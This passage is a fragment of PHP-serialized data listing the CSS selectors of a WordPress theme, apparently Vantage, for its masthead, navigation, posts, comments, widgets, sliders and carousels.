q:after\";i:52;s:13:\"blockquote, q\";i:53;s:7:\"a:focus\";i:54;s:17:\"a:hover, a:active\";i:55;s:5:\"a img\";i:56;s:37:\"body, button, input, select, textarea\";i:57;s:1:\"a\";i:58;s:26:\"a:hover, a:focus, a:active\";i:59;s:2:\"hr\";i:60;s:1:\"p\";i:61;s:6:\"ul, ol\";i:62;s:2:\"ul\";i:63;s:2:\"ol\";i:64;s:26:\"ul ul, ol ol, ul ol, ol ul\";i:65;s:2:\"dt\";i:66;s:2:\"dd\";i:67;s:9:\"b, strong\";i:68;s:16:\"dfn, cite, em, i\";i:69;s:10:\"blockquote\";i:70;s:7:\"address\";i:71;s:3:\"pre\";i:72;s:18:\"code, kbd, tt, var\";i:73;s:13:\"abbr, acronym\";i:74;s:9:\"mark, ins\";i:75;s:8:\"sup, sub\";i:76;s:3:\"sup\";i:77;s:3:\"sub\";i:78;s:5:\"small\";i:79;s:3:\"big\";i:80;s:6:\"figure\";i:81;s:2:\"th\";i:82;s:31:\"button, input, select, textarea\";i:83;s:13:\"button, input\";i:84;s:86:\"a.button, button, html input[type=\"button\"], input[type=\"reset\"], input[type=\"submit\"]\";i:85;s:116:\"a.button:focus, button:focus, html input[type=\"button\"]:focus, input[type=\"reset\"]:focus, input[type=\"submit\"]:focus\";i:86;s:121:\"a.button:active, button:active, html input[type=\"button\"]:active, input[type=\"reset\"]:active, input[type=\"submit\"]:active\";i:87;s:43:\"input[type=\"checkbox\"], input[type=\"radio\"]\";i:88;s:20:\"input[type=\"search\"]\";i:89;s:47:\"input[type=\"search\"]::-webkit-search-decoration\";i:90;s:49:\"button::-moz-focus-inner, input::-moz-focus-inner\";i:91;s:67:\"input[type=text], input[type=email], input[type=password], textarea\";i:92;s:91:\"input[type=text]:focus, input[type=email]:focus, input[type=password]:focus, textarea:focus\";i:93;s:57:\"input[type=text], input[type=email], input[type=password]\";i:94;s:8:\"textarea\";i:95;s:10:\".alignleft\";i:96;s:11:\".alignright\";i:97;s:12:\".aligncenter\";i:98;s:15:\".assistive-text\";i:99;s:11:\".page-links\";i:100;s:13:\"#site-title a\";i:101;s:13:\"#page-wrapper\";i:102;s:26:\".layout-full #page-wrapper\";i:103;s:42:\".layout-full #page-wrapper .full-container\";i:104;s:9:\"#masthead\";i:105;s:16:\"#masthead:before\";i:106;s:15:\"#masthead:after\";i:107;s:17:\"#masthead .hgroup\";i:108;s:24:\"#masthead .hgroup:before\";i:109;s:23:\"#masthead .hgroup:after\";i:110;s:19:\"#masthead .hgroup a\";i:111;s:20:\"#masthead .hgroup h1\";i:112;s:23:\"#masthead .hgroup .logo\";i:113;s:27:\"#masthead .hgroup .logo img\";i:114;s:31:\"#masthead .hgroup .support-text\";i:115;s:33:\"#masthead .hgroup #header-sidebar\";i:116;s:46:\"#masthead .hgroup #header-sidebar aside.widget\";i:117;s:57:\"#masthead .hgroup #header-sidebar aside.widget:last-child\";i:118;s:47:\"#masthead .hgroup #header-sidebar .widget-title\";i:119;s:48:\"#masthead.masthead-logo-in-menu .main-navigation\";i:120;s:55:\"#masthead.masthead-logo-in-menu .main-navigation:before\";i:121;s:54:\"#masthead.masthead-logo-in-menu .main-navigation:after\";i:122;s:37:\"#masthead.masthead-logo-in-menu .logo\";i:123;s:41:\"#masthead.masthead-logo-in-menu .logo > *\";i:124;s:43:\"#masthead.masthead-logo-in-menu .logo > img\";i:125;s:68:\"#masthead.masthead-logo-in-menu .logo > img.logo-no-height-constrain\";i:126;s:54:\".layout-boxed #masthead.masthead-logo-in-menu img.logo\";i:127;s:88:\"body.ie-8 #masthead .hgroup #header-sidebar, body.ie-9 #masthead .hgroup #header-sidebar\";i:128;s:5:\"#main\";i:129;s:12:\"#main:before\";i:130;s:11:\"#main:after\";i:131;s:8:\"#primary\";i:132;s:35:\"body.sidebar-position-left #primary\";i:133;s:199:\"body.sidebar-position-left.page-template-home-panels #primary, body.sidebar-position-left.page-template-template-full #primary, body.sidebar-position-left.page-template-template-full-notitle #primary\";i:134;s:35:\"body.sidebar-position-none #primary\";i:135;s:24:\"body.no-sidebar #primary\";i:136;s:145:\"body.siteorigin-panels-lite-home #primary, body.vantage-layout-width-full-width #primary, body.vantage-layout-width-full-width-stretched #primary\";i:137;s:66:\".vantage-layout-width-full-width-stretched #main > .full-container\";i:138;s:37:\".vantage-layout-width-normal #primary\";i:139;s:10:\"#secondary\";i:140;s:37:\"body.sidebar-position-left #secondary\";i:141;s:37:\"body.sidebar-position-none #secondary\";i:142;s:185:\".siteorigin-panels-home #primary, .page-template-templatestemplate-full-php #primary, .page-template-home-panels-php #primary, .page-template-templatestemplate-full-notitle-php #primary\";i:143;s:31:\".page-template-default #primary\";i:144;s:12:\"#main-slider\";i:145;s:24:\"#main-slider .flexslider\";i:146;s:15:\"#main-slider h1\";i:147;s:29:\"#main-slider .text-em-wrapper\";i:148;s:55:\"#main-slider .metaslider, #main-slider #metaslider-demo\";i:149;s:29:\"#main-slider #metaslider-demo\";i:150;s:34:\"#masthead.force-responsive .hgroup\";i:151;s:40:\"#masthead.force-responsive .hgroup .logo\";i:152;s:44:\"#masthead.force-responsive .hgroup .logo img\";i:153;s:100:\"#masthead.force-responsive .hgroup .support-text, #masthead.force-responsive .hgroup #header-sidebar\";i:154;s:108:\"#masthead.force-responsive .hgroup .support-text img, #masthead.force-responsive .hgroup #header-sidebar img\";i:155;s:50:\"#masthead.force-responsive .hgroup #header-sidebar\";i:156;s:58:\"#masthead.force-responsive .hgroup #header-sidebar .widget\";i:157;s:29:\"body.responsive #page-wrapper\";i:158;s:41:\"body.responsive.layout-full #page-wrapper\";i:159;s:42:\"body.responsive.layout-boxed #page-wrapper\";i:160;s:57:\"body.responsive.layout-full #page-wrapper .full-container\";i:161;s:16:\".main-navigation\";i:162;s:34:\".main-navigation [class^=\"fa fa-\"]\";i:163;s:42:\".main-navigation a:hover [class^=\"fa fa-\"]\";i:164;s:19:\".main-navigation ul\";i:165;s:26:\".main-navigation ul:before\";i:166;s:25:\".main-navigation ul:after\";i:167;s:22:\".main-navigation ul li\";i:168;s:32:\".main-navigation ul li:hover > a\";i:169;s:24:\".main-navigation ul li a\";i:170;s:54:\".main-navigation ul li a, .main-navigation ul li a > *\";i:171;s:22:\".main-navigation ul ul\";i:172;s:24:\".main-navigation ul ul a\";i:173;s:25:\".main-navigation ul ul li\";i:174;s:35:\".main-navigation ul ul li:hover > a\";i:175;s:25:\".main-navigation ul ul ul\";i:176;s:33:\".main-navigation ul li:hover > ul\";i:177;s:18:\".main-navigation a\";i:178;s:29:\".main-navigation.sticky:after\";i:179;s:40:\"body.has-menu-search .main-navigation ul\";i:180;s:52:\"body.so-vantage-mobile-device .main-navigation ul ul\";i:181;s:60:\"body.so-vantage-mobile-device .main-navigation li:hover > ul\";i:182;s:35:\".mobile-nav-frame [class^=\"fa fa-\"]\";i:183;s:16:\".mobile-nav-icon\";i:184;s:23:\".mobile-nav-icon:before\";i:185;s:12:\"#search-icon\";i:186;s:30:\"#search-icon #search-icon-icon\";i:187;s:75:\"#search-icon #search-icon-icon, #search-icon #search-icon-icon .icon-search\";i:188;s:51:\"#search-icon #search-icon-icon .vantage-icon-search\";i:189;s:36:\"#search-icon #search-icon-icon:hover\";i:190;s:57:\"#search-icon #search-icon-icon:hover .vantage-icon-search\";i:191;s:24:\"#search-icon .searchform\";i:192;s:38:\"#search-icon .searchform input[name=s]\";i:193;s:14:\"article.sticky\";i:194;s:11:\"#page-title\";i:195;s:13:\"#page-title a\";i:196;s:21:\".taxonomy-description\";i:197;s:26:\"article.post, article.page\";i:198;s:40:\"article.post:before, article.page:before\";i:199;s:38:\"article.post:after, article.page:after\";i:200;s:40:\"article.post footer, article.page footer\";i:201;s:72:\"article.post footer .post-type-icon, article.page footer .post-type-icon\";i:202;s:52:\"article.post footer .tags, article.page footer .tags\";i:203;s:56:\"article.post footer .tags a, article.page footer .tags a\";i:204;s:54:\"article.post .entry-header, article.page .entry-header\";i:205;s:88:\"article.post .entry-header .entry-thumbnail, article.page .entry-header .entry-thumbnail\";i:206;s:96:\"article.post .entry-header .entry-thumbnail img, article.page .entry-header .entry-thumbnail img\";i:207;s:92:\"article.post .entry-header .entry-thumbnail a, article.page .entry-header .entry-thumbnail a\";i:208;s:84:\"article.post .entry-header h1.entry-title, article.page .entry-header h1.entry-title\";i:209;s:88:\"article.post .entry-header h1.entry-title a, article.page .entry-header h1.entry-title a\";i:210;s:78:\"article.post .entry-header .entry-meta, article.page .entry-header .entry-meta\";i:211;s:82:\"article.post .entry-header .entry-meta a, article.page .entry-header .entry-meta a\";i:212;s:48:\"article.post:last-child, article.page:last-child\";i:213;s:48:\"article.post .more-link, article.page .more-link\";i:214;s:68:\"article.post .more-link .meta-nav, article.page .more-link .meta-nav\";i:215;s:50:\"article.post .author-box, article.page .author-box\";i:216;s:64:\"article.post .author-box:before, article.page .author-box:before\";i:217;s:62:\"article.post .author-box:after, article.page .author-box:after\";i:218;s:74:\"article.post .author-box .avatar-box, article.page .author-box .avatar-box\";i:219;s:106:\"article.post .author-box .avatar-box .avatar-wrapper, article.page .author-box .avatar-box .avatar-wrapper\";i:220;s:114:\"article.post .author-box .avatar-box .avatar-wrapper img, article.page .author-box .avatar-box .avatar-wrapper img\";i:221;s:76:\"article.post .author-box .box-content, article.page .author-box .box-content\";i:222;s:98:\"article.post .author-box .box-content .box-title, article.page .author-box .box-content .box-title\";i:223;s:110:\"article.post .author-box .box-content .box-description, article.page .author-box .box-content .box-description\";i:224;s:142:\"article.post .author-box .box-content .box-description > *:first-child, article.page .author-box .box-content .box-description > *:first-child\";i:225;s:140:\"article.post .author-box .box-content .box-description > *:last-child, article.page .author-box .box-content .box-description > *:last-child\";i:226;s:56:\"article.post .share-buttons, article.page .share-buttons\";i:227;s:70:\"article.post .share-buttons:before, article.page .share-buttons:before\";i:228;s:68:\"article.post .share-buttons:after, article.page .share-buttons:after\";i:229;s:82:\"article.post .entry-summary p:last-child, article.page .entry-summary p:last-child\";i:230;s:62:\"article.post .entry-categories, article.page .entry-categories\";i:231;s:66:\"article.post .entry-categories a, article.page .entry-categories a\";i:232;s:110:\"article.post.post-with-thumbnail-icon .entry-thumbnail, article.page.post-with-thumbnail-icon .entry-thumbnail\";i:233;s:118:\"article.post.post-with-thumbnail-icon .entry-thumbnail img, article.page.post-with-thumbnail-icon .entry-thumbnail img\";i:234;s:100:\"article.post.post-with-thumbnail-icon .entry-main, article.page.post-with-thumbnail-icon .entry-main\";i:235;s:35:\".post-navigation, #image-navigation\";i:236;s:49:\".post-navigation:before, #image-navigation:before\";i:237;s:47:\".post-navigation:after, #image-navigation:after\";i:238;s:39:\".post-navigation a, #image-navigation a\";i:239;s:59:\".post-navigation a .meta-nav, #image-navigation a .meta-nav\";i:240;s:51:\".post-navigation a:hover, #image-navigation a:hover\";i:241;s:83:\".post-navigation .nav-previous .meta-nav, #image-navigation .nav-previous .meta-nav\";i:242;s:75:\".post-navigation .nav-next .meta-nav, #image-navigation .nav-next .meta-nav\";i:243;s:19:\".single-nav-wrapper\";i:244;s:17:\"#image-navigation\";i:245;s:13:\".entry-header\";i:246;s:20:\".entry-header:before\";i:247;s:19:\".entry-header:after\";i:248;s:14:\".entry-content\";i:249;s:21:\".entry-content:before\";i:250;s:20:\".entry-content:after\";i:251;s:16:\".entry-content a\";i:252;s:22:\".entry-content a:hover\";i:253;s:147:\".entry-content p, .entry-content > ul, .entry-content > li, .entry-content > dl, .entry-content pre, .entry-content code, .entry-content blockquote\";i:254;s:29:\".entry-content > *:last-child\";i:255;s:30:\".entry-content > *:first-child\";i:256;s:25:\".entry-content blockquote\";i:257;s:30:\".entry-content blockquote cite\";i:258;s:39:\".entry-content pre, .entry-content code\";i:259;s:67:\".entry-content pre p:first-child, .entry-content code p:first-child\";i:260;s:19:\".entry-content code\";i:261;s:38:\".entry-content sup, .entry-content sub\";i:262;s:18:\".entry-content sup\";i:263;s:18:\".entry-content sub\";i:264;s:23:\".entry-content .gallery\";i:265;s:37:\".entry-content .gallery .gallery-item\";i:266;s:37:\".entry-content .gallery .gallery-icon\";i:267;s:27:\".entry-content .gallery img\";i:268;s:40:\".entry-content .gallery .gallery-caption\";i:269;s:20:\".entry-content table\";i:270;s:18:\".entry-content img\";i:271;s:26:\".entry-content .wp-caption\";i:272;s:30:\".entry-content .wp-caption img\";i:273;s:38:\".entry-content .wp-caption.aligncenter\";i:274;s:38:\".entry-content .wp-caption:first-child\";i:275;s:44:\".entry-content .wp-caption p.wp-caption-text\";i:276;s:25:\".entry-content .alignleft\";i:277;s:26:\".entry-content .alignright\";i:278;s:28:\".entry-content img.wp-smiley\";i:279;s:17:\".entry-content ul\";i:280;s:17:\".entry-content ol\";i:281;s:20:\".entry-content ol ol\";i:282;s:23:\".entry-content ol ol ol\";i:283;s:42:\".entry-content ul li, .entry-content ol li\";i:284;s:20:\".entry-content dl dt\";i:285;s:20:\".entry-content dl dd\";i:286;s:112:\".entry-content h1, .entry-content h2, .entry-content h3, .entry-content h4, .entry-content h5, .entry-content h6\";i:287;s:17:\".entry-content h1\";i:288;s:17:\".entry-content h2\";i:289;s:17:\".entry-content h3\";i:290;s:17:\".entry-content h4\";i:291;s:17:\".entry-content h5\";i:292;s:17:\".entry-content h6\";i:293;s:66:\".entry-content embed, .entry-content iframe, .entry-content object\";i:294;s:20:\".entry-content .tags\";i:295;s:27:\".entry-content .tags strong\";i:296;s:22:\".entry-content .tags a\";i:297;s:39:\".pagination, .entry-content .pagination\";i:298;s:94:\".pagination span, .entry-content .pagination span, .pagination a, .entry-content .pagination a\";i:299;s:138:\".pagination span:last-child, .entry-content .pagination span:last-child, .pagination a:last-child, .entry-content .pagination a:last-child\";i:300;s:55:\".pagination a:hover, .entry-content .pagination a:hover\";i:301;s:57:\".pagination .current, .entry-content .pagination .current\";i:302;s:52:\".site-content .nav-previous, .site-content .nav-next\";i:303;s:27:\".site-content .nav-previous\";i:304;s:23:\".site-content .nav-next\";i:305;s:29:\"#comments-title, #reply-title\";i:306;s:65:\"#comments-title [class^=\"fa fa-\"], #reply-title [class^=\"fa fa-\"]\";i:307;s:29:\"#comments .comment-navigation\";i:308;s:36:\"#comments .comment-navigation:before\";i:309;s:35:\"#comments .comment-navigation:after\";i:310;s:22:\"#comments .commentlist\";i:311;s:32:\"#comments .commentlist .children\";i:312;s:30:\"#comments .commentlist article\";i:313;s:38:\"#comments .commentlist article .avatar\";i:314;s:194:\"#comments .commentlist article .comment-author, #comments .commentlist article .awaiting-moderation, #comments .commentlist article .comment-meta, #comments .commentlist article .comment-content\";i:315;s:46:\"#comments .commentlist article .comment-author\";i:316;s:48:\"#comments .commentlist article .comment-author a\";i:317;s:51:\"#comments .commentlist article .comment-author cite\";i:318;s:44:\"#comments .commentlist article .comment-meta\";i:319;s:46:\"#comments .commentlist article .comment-meta a\";i:320;s:53:\"#comments .commentlist article .comment-meta .support\";i:321;s:51:\"#comments .commentlist article .awaiting-moderation\";i:322;s:45:\"#comments .commentlist article .entry-content\";i:323;s:36:\"#comments .commentlist .bypostauthor\";i:324;s:18:\"#commentform label\";i:325;s:41:\"#commentform input, #commentform textarea\";i:326;s:21:\"#commentform textarea\";i:327;s:18:\"#commentform input\";i:328;s:14:\"#commentform p\";i:329;s:21:\"#commentform p:before\";i:330;s:20:\"#commentform p:after\";i:331;s:26:\"#commentform p.form-submit\";i:332;s:20:\"#commentform #submit\";i:333;s:98:\"#commentform .form-allowed-tags, #commentform .form-allowed-tags code, #commentform .comment-notes\";i:334;s:26:\"#commentform .logged-in-as\";i:335;s:22:\"#commentform .required\";i:336;s:9:\"#colophon\";i:337;s:50:\"#colophon #theme-attribution, #colophon #site-info\";i:338;s:54:\"#colophon #theme-attribution a, #colophon #site-info a\";i:339;s:16:\"body.layout-full\";i:340;s:22:\".layout-full #colophon\";i:341;s:14:\"#scroll-to-top\";i:342;s:37:\"#scroll-to-top .vantage-icon-arrow-up\";i:343;s:24:\"#scroll-to-top.displayed\";i:344;s:33:\"#map-canvas img, #gmap_canvas img\";i:345;s:8:\".updated\";i:346;s:17:\".page .entry-meta\";i:347;s:34:\".page .panel-grid-cell .entry-meta\";i:348;s:40:\"#commentform p.comment-subscription-form\";i:349;s:63:\"#commentform p.comment-subscription-form input[type=\"checkbox\"]\";i:350;s:62:\"#commentform p.comment-subscription-form label.subscribe-label\";i:351;s:92:\".flex-container a:active, .flexslider a:active, .flex-container a:focus, .flexslider a:focus\";i:352;s:47:\".slides, .flex-control-nav, .flex-direction-nav\";i:353;s:11:\".flexslider\";i:354;s:19:\".flexslider .slides\";i:355;s:26:\".flexslider .slides:before\";i:356;s:25:\".flexslider .slides:after\";i:357;s:25:\".flexslider .slides > img\";i:358;s:25:\".flexslider .slides p img\";i:359;s:33:\".flexslider .slides .flex-caption\";i:360;s:36:\".flexslider .slides .flex-caption h3\";i:361;s:24:\".flexslider .slides > li\";i:362;s:37:\".flexslider .slides > li .content img\";i:363;s:32:\".flexslider .flex-control-paging\";i:364;s:35:\".flexslider .flex-control-paging li\";i:365;s:37:\".flexslider .flex-control-paging li a\";i:366;s:49:\".flexslider .flex-control-paging li a.flex-active\";i:367;s:43:\".flexslider .flex-control-paging li a:hover\";i:368;s:31:\".flexslider .flex-direction-nav\";i:369;s:34:\".flexslider .flex-direction-nav li\";i:370;s:42:\".flexslider:hover .flex-direction-nav li a\";i:371;s:66:\".metaslider .msHtmlOverlay .layer .siteorigin-slider-action-button\";i:372;s:68:\".metaslider .msHtmlOverlay .layer .siteorigin-slider-action-button a\";i:373;s:61:\"#metaslider-demo .content, .vantage-slide-with-image .content\";i:374;s:69:\"#metaslider-demo .content img, .vantage-slide-with-image .content img\";i:375;s:79:\"#metaslider-demo .ms-default-image, .vantage-slide-with-image .ms-default-image\";i:376;s:7:\".widget\";i:377;s:14:\".widget select\";i:378;s:13:\"#searchsubmit\";i:379;s:25:\".textwidget p:first-child\";i:380;s:24:\".textwidget p:last-child\";i:381;s:43:\"#secondary .widget, #footer-widgets .widget\";i:382;s:65:\"#secondary .widget:last-child, #footer-widgets .widget:last-child\";i:383;s:71:\"#secondary .widget .widget-title, #footer-widgets .widget .widget-title\";i:384;s:100:\"#secondary .widget ul, #footer-widgets .widget ul, #secondary .widget ol, #footer-widgets .widget ol\";i:385;s:226:\"#secondary .widget ul ul, #footer-widgets .widget ul ul, #secondary .widget ol ul, #footer-widgets .widget ol ul, #secondary .widget ul ol, #footer-widgets .widget ul ol, #secondary .widget ol ol, #footer-widgets .widget ol ol\";i:386;s:120:\"#secondary .widget ul li a, #footer-widgets .widget ul li a, #secondary .widget ol li a, #footer-widgets .widget ol li a\";i:387;s:15:\"#footer-widgets\";i:388;s:22:\"#footer-widgets:before\";i:389;s:21:\"#footer-widgets:after\";i:390;s:23:\"#footer-widgets .widget\";i:391;s:87:\"#footer-widgets .widget.panel, #footer-widgets .widget.widget_siteorigin-panels-builder\";i:392;s:25:\"#footer-widgets .widget a\";i:393;s:37:\"#footer-widgets .widget .widget-title\";i:394;s:74:\".widget img, .widget iframe, .widget object, .widget select, .widget input\";i:395;s:11:\".widget img\";i:396;s:16:\".widget a.button\";i:397;s:38:\".widget .button-container.align-center\";i:398;s:36:\".widget .button-container.align-left\";i:399;s:37:\".widget .button-container.align-right\";i:400;s:44:\".widget .button-container.align-full .button\";i:401;s:12:\"#wp-calendar\";i:402;s:20:\"#wp-calendar caption\";i:403;s:32:\"#wp-calendar th, #wp-calendar td\";i:404;s:21:\"#wp-calendar thead th\";i:405;s:23:\"#wp-calendar tbody .pad\";i:406;s:21:\"#wp-calendar tbody td\";i:407;s:27:\"#wp-calendar tbody td:hover\";i:408;s:23:\"#wp-calendar tbody td a\";i:409;s:29:\"#wp-calendar tbody td a:hover\";i:410;s:50:\"#wp-calendar tfoot #prev, #wp-calendar tfoot #next\";i:411;s:24:\"#wp-calendar tfoot #next\";i:412;s:34:\".site-footer #wp-calendar tbody td\";i:413;s:36:\".site-footer #wp-calendar tbody td a\";i:414;s:42:\".site-footer #wp-calendar tbody td a:hover\";i:415;s:92:\".site-footer #wp-calendar tfoot #prev a:hover, .site-footer #wp-calendar tfoot #next a:hover\";i:416;s:22:\".widget_call-to-action\";i:417;s:38:\".widget_call-to-action h2.cta-headline\";i:418;s:37:\".widget_call-to-action p.cta-sub-text\";i:419;s:31:\".widget_call-to-action a.button\";i:420;s:29:\".widget_siteorigin-list ul li\";i:421;s:40:\".widget_siteorigin-list ul li:last-child\";i:422;s:17:\".widget_icon-text\";i:423;s:31:\".widget_icon-text .feature-icon\";i:424;s:31:\".widget_icon-text .widget-title\";i:425;s:25:\".widget_circleicon-widget\";i:426;s:42:\".widget_circleicon-widget .circle-icon-box\";i:427;s:63:\".widget_circleicon-widget .circle-icon-box.circle-icon-show-box\";i:428;s:63:\".widget_circleicon-widget .circle-icon-box.circle-icon-hide-box\";i:429;s:109:\".widget_circleicon-widget .circle-icon-box .link-icon, .widget_circleicon-widget .circle-icon-box .link-title\";i:430;s:55:\".widget_circleicon-widget .circle-icon-box .circle-icon\";i:431;s:73:\".widget_circleicon-widget .circle-icon-box .circle-icon [class^=\"fa fa-\"]\";i:432;s:45:\".widget_circleicon-widget .circle-icon-box h4\";i:433;s:49:\".widget_circleicon-widget .circle-icon-box p.text\";i:434;s:60:\".widget_circleicon-widget .circle-icon-box p.text:last-child\";i:435;s:56:\".widget_circleicon-widget .circle-icon-box a.more-button\";i:436;s:67:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-top\";i:437;s:80:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-top .circle-icon\";i:438;s:70:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-bottom\";i:439;s:83:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-bottom .circle-icon\";i:440;s:68:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-left\";i:441;s:81:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-left .circle-icon\";i:442;s:69:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-right\";i:443;s:82:\".widget_circleicon-widget .circle-icon-box.circle-icon-position-right .circle-icon\";i:444;s:66:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium\";i:445;s:79:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium .circle-icon\";i:446;s:97:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium .circle-icon [class^=\"fa fa-\"]\";i:447;s:91:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-top\";i:448;s:104:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-top .circle-icon\";i:449;s:94:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-bottom\";i:450;s:107:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-bottom .circle-icon\";i:451;s:92:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-left\";i:452;s:105:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-left .circle-icon\";i:453;s:93:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-right\";i:454;s:106:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-medium.circle-icon-position-right .circle-icon\";i:455;s:65:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large\";i:456;s:78:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large .circle-icon\";i:457;s:96:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large .circle-icon [class^=\"fa fa-\"]\";i:458;s:90:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-top\";i:459;s:103:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-top .circle-icon\";i:460;s:93:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-bottom\";i:461;s:106:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-bottom .circle-icon\";i:462;s:91:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-left\";i:463;s:104:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-left .circle-icon\";i:464;s:92:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-right\";i:465;s:105:\".widget_circleicon-widget .circle-icon-box.circle-icon-size-large.circle-icon-position-right .circle-icon\";i:466;s:23:\".widget_headline-widget\";i:467;s:26:\".widget_headline-widget h1\";i:468;s:26:\".widget_headline-widget h3\";i:469;s:35:\".widget_headline-widget .decoration\";i:470;s:28:\".widget_vantage-social-media\";i:471;s:35:\".widget_vantage-social-media:before\";i:472;s:34:\".widget_vantage-social-media:after\";i:473;s:47:\".widget_vantage-social-media .social-media-icon\";i:474;s:65:\".widget_vantage-social-media .social-media-icon [class^=\"fa fa-\"]\";i:475;s:51:\".widget_vantage-social-media .social-media-icon img\";i:476;s:58:\".widget_vantage-social-media .social-media-icon:last-child\";i:477;s:74:\".widget_vantage-social-media .social-media-icon.social-media-icon-facebook\";i:478;s:80:\".widget_vantage-social-media .social-media-icon.social-media-icon-facebook:hover\";i:479;s:73:\".widget_vantage-social-media .social-media-icon.social-media-icon-twitter\";i:480;s:79:\".widget_vantage-social-media .social-media-icon.social-media-icon-twitter:hover\";i:481;s:77:\".widget_vantage-social-media .social-media-icon.social-media-icon-google-plus\";i:482;s:83:\".widget_vantage-social-media .social-media-icon.social-media-icon-google-plus:hover\";i:483;s:69:\".widget_vantage-social-media .social-media-icon.social-media-icon-rss\";i:484;s:75:\".widget_vantage-social-media .social-media-icon.social-media-icon-rss:hover\";i:485;s:40:\"#header-sidebar .widget_nav_menu ul.menu\";i:486;s:45:\"#header-sidebar .widget_nav_menu ul.menu > li\";i:487;s:56:\"#header-sidebar .widget_nav_menu ul.menu > li:last-child\";i:488;s:49:\"#header-sidebar .widget_nav_menu ul.menu > li > a\";i:489;s:57:\"#header-sidebar .widget_nav_menu ul.menu > li ul.sub-menu\";i:490;s:60:\"#header-sidebar .widget_nav_menu ul.menu > li ul.sub-menu li\";i:491;s:62:\"#header-sidebar .widget_nav_menu ul.menu > li ul.sub-menu li a\";i:492;s:60:\"#header-sidebar .widget_nav_menu ul.menu > li ul.sub-menu ul\";i:493;s:59:\"#header-sidebar .widget_nav_menu ul.menu > li > ul.sub-menu\";i:494;s:63:\"#header-sidebar .widget_nav_menu ul.menu li:hover > ul.sub-menu\";i:495;s:16:\".panel-row-style\";i:496;s:23:\".panel-row-style:before\";i:497;s:22:\".panel-row-style:after\";i:498;s:26:\".panel-row-style-wide-grey\";i:499;s:168:\".layout-full .panel-row-style.panel-row-style-wide-grey, .layout-full .panel-row-style.panel-row-style-full-width, .layout-full.panels-style-force-full .panel-row-style\";i:500;s:30:\".layout-boxed .panel-row-style\";i:501;s:28:\".panel-grid-cell .flexslider\";i:502;s:23:\".vantage-carousel-title\";i:503;s:52:\".vantage-carousel-title .vantage-carousel-title-text\";i:504;s:66:\".vantage-carousel-title a.next, .vantage-carousel-title a.previous\";i:505;s:236:\".vantage-carousel-title a.next .vantage-icon-arrow-left, .vantage-carousel-title a.previous .vantage-icon-arrow-left, .vantage-carousel-title a.next .vantage-icon-arrow-right, .vantage-carousel-title a.previous .vantage-icon-arrow-right\";i:506;s:25:\".vantage-carousel-wrapper\";i:507;s:43:\".vantage-carousel-wrapper .vantage-carousel\";i:508;s:50:\".vantage-carousel-wrapper .vantage-carousel:before\";i:509;s:49:\".vantage-carousel-wrapper .vantage-carousel:after\";i:510;s:61:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry\";i:511;s:72:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry:last-child\";i:512;s:72:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry .thumbnail\";i:513;s:74:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry .thumbnail a\";i:514;s:163:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry .thumbnail a, .vantage-carousel-wrapper .vantage-carousel li.carousel-entry .thumbnail a span.overlay\";i:515;s:87:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry .thumbnail a span.overlay\";i:516;s:80:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry .thumbnail a:hover\";i:517;s:85:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry .thumbnail a:hover span\";i:518;s:80:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry .default-thumbnail\";i:519;s:64:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry h3\";i:520;s:66:\".vantage-carousel-wrapper .vantage-carousel li.carousel-entry h3 a\";i:521;s:54:\".vantage-carousel-wrapper .vantage-carousel li.loading\";i:522;s:18:\".vantage-grid-loop\";i:523;s:25:\".vantage-grid-loop:before\";i:524;s:24:\".vantage-grid-loop:after\";i:525;s:26:\".vantage-grid-loop article\";i:526;s:42:\".vantage-grid-loop article .grid-thumbnail\";i:527;s:48:\".vantage-grid-loop article .grid-thumbnail:hover\";i:528;s:46:\".vantage-grid-loop article .grid-thumbnail img\";i:529;s:29:\".vantage-grid-loop article h3\";i:530;s:31:\".vantage-grid-loop article h3 a\";i:531;s:35:\".vantage-grid-loop article .excerpt\";i:532;s:37:\".vantage-grid-loop article .excerpt p\";i:533;s:25:\".vantage-grid-loop .clear\";i:534;s:49:\".widget_siteorigin-panels-postloop h1.entry-title\";i:535;s:46:\".widget_siteorigin-panels-postloop .pagination\";i:536;s:24:\".vantage-circleicon-loop\";i:537;s:31:\".vantage-circleicon-loop:before\";i:538;s:30:\".vantage-circleicon-loop:after\";i:539;s:50:\".vantage-circleicon-loop 